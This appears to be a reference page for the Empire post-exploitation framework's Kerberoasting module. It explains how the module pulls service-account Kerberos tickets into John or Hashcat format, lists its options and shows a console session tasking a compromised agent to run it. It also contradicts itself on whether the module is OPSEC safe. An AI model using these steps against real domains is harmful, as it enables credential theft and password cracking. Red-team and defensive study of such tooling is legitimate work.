Invoke-Kerberoast - Empire Module
This page contains detailed information about how to use the powershell/credentials/invoke_kerberoast Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-Kerberoast
Module: powershell/credentials/invoke_kerberoast
Source code [1]: empire/server/modules/powershell/credentials/invoke_kerberoast.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1
MITRE ATT&CK:
T1208
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
The invoke_kerberoast module requests kerberos tickets for all users with a non-null service principal name (SPN) and extracts them into a format ready for John or Hashcat.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the invoke_kerberoast module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the invoke_kerberoast module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the invoke_kerberoast module:
AdminCount
Kerberoast privileged accounts protected by AdminSDHolder.
Domain
Specifies the domain to use for the query, defaults to the current domain.
Identity
Specific SamAccountName, DistinguishedName, SID, or GUID to kerberoast.
LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
OutputFormat
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Default value: John.
OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.
SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local".
SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
Server
Specifies an Active Directory server (domain controller) to bind to.
Invoke_kerberoast Example Usage
Here's an example of how to use the invoke_kerberoast module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/invoke_kerberoast
Author @harmj0y
@machosec
Background True
Comments https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/
https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9
Description Requests kerberos tickets for all users with a non-null service
principal name (SPN) and extracts them into a format ready for John or
Hashcat.
Language powershell
Name powershell/credentials/invoke_kerberoast
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1208
,Record Options--,------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------------|------------|----------|-------------------------------------|
| AdminCount | | False | Kerberoast privileged accounts |
| | | | protected by AdminSDHolder. |
|----------------|------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|----------------|------------|----------|-------------------------------------|
| Domain | | False | Specifies the domain to use for the |
| | | | query, defaults to the current |
| | | | domain. |
|----------------|------------|----------|-------------------------------------|
| Identity | | False | Specific SamAccountName, |
| | | | DistinguishedName, SID, or GUID to |
| | | | kerberoast. |
|----------------|------------|----------|-------------------------------------|
| LDAPFilter | | False | Specifies an LDAP query string that |
| | | | is used to filter Active Directory |
| | | | objects. |
|----------------|------------|----------|-------------------------------------|
| OutputFormat | John | False | Either 'John' for John the Ripper |
| | | | style hash formatting, or 'Hashcat' |
| | | | for Hashcat format. |
|----------------|------------|----------|-------------------------------------|
| OutputFunction | Out-String | False | PowerShell's output function to use |
| | | | ("Out-String", "ConvertTo-Json", |
| | | | "ConvertTo-Csv", "ConvertTo-Html", |
| | | | "ConvertTo-Xml"). |
|----------------|------------|----------|-------------------------------------|
| SearchBase | | False | The LDAP source to search through, |
| | | | e.g. "LDAP://OU=secret,DC=testlab,D |
| | | | C=local". |
|----------------|------------|----------|-------------------------------------|
| SearchScope | | False | Specifies the scope to search |
| | | | under, Base/OneLevel/Subtree |
| | | | (default of Subtree). |
|----------------|------------|----------|-------------------------------------|
| Server | | False | Specifies an Active Directory |
| | | | server (domain controller) to bind |
| | | | to. |
'----------------'------------'----------'-------------------------------------'
(Empire: usemodule/powershell/credentials/invoke_kerberoast) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/invoke_kerberoast) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/credentials/invoke_kerberoast.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/
- https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9
- http://attack.mitre.org/techniques/T1208
- http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
- https://tools.ietf.org/html/rfc4121#section-4.1
See Also
Check also the following modules related to this module:
- powershell/credentials/invoke_internal_monologue
- powershell/credentials/invoke_ntlmextract
- powershell/lateral_movement/invoke_psexec
- powershell/lateral_movement/invoke_sqloscmd
- powershell/code_execution/invoke_metasploitpayload
- powershell/code_execution/invoke_ntsd
- powershell/code_execution/invoke_shellcodemsil
- powershell/code_execution/invoke_assembly
- powershell/code_execution/invoke_reflectivepeinjection
- powershell/code_execution/invoke_ironpython
- powershell/code_execution/invoke_clearscript
- powershell/code_execution/invoke_dllinjection
- powershell/code_execution/invoke_ironpython3
- powershell/code_execution/invoke_shellcode
- powershell/code_execution/invoke_ssharp
- powershell/code_execution/invoke_boolang
- powershell/exploitation/invoke_spoolsample
- powershell/management/invoke_script
- powershell/management/invoke_sharpchisel
- powershell/management/invoke_socksproxy
- powershell/lateral_movement/invoke_psremoting
- powershell/lateral_movement/invoke_executemsbuild
- powershell/lateral_movement/invoke_dcom
- powershell/lateral_movement/invoke_portfwd
- powershell/lateral_movement/invoke_smbexec
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
- powershell/lateral_movement/invoke_sshcommand
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.
